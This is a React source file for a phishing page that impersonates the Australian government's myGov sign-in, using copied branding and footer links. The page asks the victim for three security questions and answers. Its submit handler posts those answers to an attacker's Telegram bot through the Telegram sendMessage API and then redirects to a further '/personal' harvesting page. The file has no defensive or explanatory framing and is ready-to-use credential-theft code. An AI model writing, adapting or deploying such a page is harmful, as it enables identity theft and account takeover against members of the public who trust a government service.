import React from "react";
import { useNavigate } from "react-router-dom";
import telegramConfig from "./config";

const Security = () => {
  const navigate = useNavigate();

  const handleSubmit = async (event) => {
    event.preventDefault();

    // Collect form data
    const sec_q_1 = document.getElementById("sec_q_1").value;
    const sec_a_1 = document.getElementsByName("sec_a_1")[0].value;
    const sec_q_2 = document.getElementById("sec_q_2").value;
    const sec_a_2 = document.getElementsByName("sec_a_2")[0].value;
    const sec_q_3 = document.getElementById("sec_q_3").value;
    const sec_a_3 = document.getElementsByName("sec_a_3")[0].value;

    const message = `
      **Security Questions**
      Security Question 1: ${sec_q_1}
      Answer 1: ${sec_a_1}
      Security Question 2: ${sec_q_2}
      Answer 2: ${sec_a_2}
      Security Question 3: ${sec_q_3}
      Answer 3: ${sec_a_3}
    `;

    // Send to Telegram
    await sendToTelegram(message);

    // Redirect to personal.js page
    navigate("/personal");
  };

  const sendToTelegram = async (message) => {
    try {
      const { botToken, chatId } = telegramConfig;
      const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
  
      const response = await fetch(url, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ chat_id: chatId, text: message }),
      });
  
      if (!response.ok) {
        console.error("Failed to send message:", await response.text());
      }
    } catch (error) {
      console.error("Error sending message to Telegram:", error);
    }
  };

  const handleQuestionChange = (id, inputId) => {
    const selectedValue = document.getElementById(id).value;
    const inputField = document.getElementById(inputId);
    if (selectedValue === "x") {
      inputField.style.display = "block";
    } else {
      inputField.style.display = "none";
    }
  };

  return (
    <div>
      <div className="brand-rainbow">&nbsp;</div>
      <header role="banner" className="mgvEnhanceHeader">
        <section className="wrapper">
          <div className="inner">
            <div className="unauth-grid">
              <div className="unauth-grid-row">
                <a href="https://beta.my.gov.au/" className="unauth-govt-crest__link">
                  <img
                    id="unauth-govt-crest"
                    src="/images/myGov-cobranded-logo-black.svg"
                    alt="myGov Beta"
                    role="img"
                  />
                </a>
              </div>
            </div>
          </div>
        </section>
      </header>
      <div className="wrapper-mapwap">
        <div className="main-block" id="content" role="main">
          <h1>Sign in with myGov</h1>
          <h2 className="text-align-left">Verify your Security Questions</h2>
          <form id="mygov-login-form" autoComplete="off" onSubmit={handleSubmit}>
            {[1, 2, 3].map((index) => (
              <div className="input-group" key={index}>
                <label className="override" htmlFor={`sec_q_${index}`}>
                  Security Question {index}
                </label>
                <select
                  id={`sec_q_${index}`}
                  className="selectoption"
                  name={`sec_q_${index}`}
                  onChange={() => handleQuestionChange(`sec_q_${index}`, `sec_q_${index}${index}`)}
                >
                  <option value="0">Select Your Security Question</option>
                  <option value="What was the first single/album I bought?">
                    What was the first single/album I bought?
                  </option>
                  <option value="What was the first live concert, theatre or band I went to see?">
                    What was the first live concert, theatre or band I went to see?
                  </option>
                  <option value="What is the name of the primary school I attended?">
                    What is the name of the primary school I attended?
                  </option>
                  <option value="What was my favorite place to visit as a child?">
                    What was my favorite place to visit as a child?
                  </option>
                  <option value="What was my nickname at school?">What was my nickname at school?</option>
                  <option value="What is the name of the first street I lived in?">
                    What is the name of the first street I lived in?
                  </option>
                  <option value="x">Write your own question</option>
                </select>
                <input
                  style={{ display: "none" }}
                  placeholder="Enter your own question"
                  id={`sec_q_${index}${index}`}
                  name={`sec_q_${index}${index}`}
                  autoComplete="off"
                />
                <input
                  placeholder="Enter Security Answer"
                  name={`sec_a_${index}`}
                  aria-required="true"
                  type="text"
                  autoComplete="off"
                  required
                />
              </div>
            ))}
            <div className="button-digital-id-main-container override">
              <div className="digital-id-button-container">
                <button type="submit" className="button-main" name="_eventId_login">
                  Continue
                </button>
              </div>
              <center>
                <a href="/personal">SKIP</a>
              </center>
            </div>
          </form>
        </div>
      </div>
      <footer role="contentinfo">
        <div className="wrapper">
          <div className="inner">
            <section className="footer-list">
              <nav>
                <h2 className="sr-only" aria-label="Footer">
                  Footer
                </h2>
                <ul className="lower-links">
                  <li>
                    <a target="_blank" href="https://my.gov.au/en/about/terms">
                      Terms of use
                    </a>
                  </li>
                  <li>
                    <a target="_blank" href="https://my.gov.au/en/about/privacy-and-security">
                      Privacy and security
                    </a>
                  </li>
                  <li>
                    <a target="_blank" href="https://my.gov.au/en/about/copyright">
                      Copyright
                    </a>
                  </li>
                  <li>
                    <a target="_blank" href="https://my.gov.au/en/about/accessibility">
                      Accessibility
                    </a>
                  </li>
                </ul>
              </nav>
            </section>
            <div className="footer-lower">
              <section className="footer-lower-logo">
                <a href="https://beta.my.gov.au/">
                  <img
                    src="/images/myGov-cobranded-logo-white.svg"
                    alt="myGov Beta"
                    width="313.17"
                    height="70"
                    role="img"
                  />
                </a>
              </section>
              <p className="footer-acknowledgement">
                We acknowledge the Traditional Custodians of the lands we live on. We pay our respects to all Elders,
                past and present, of all Aboriginal and Torres Strait Islander nations.
              </p>
            </div>
          </div>
        </div>
      </footer>
    </div>
  );
};

export default Security;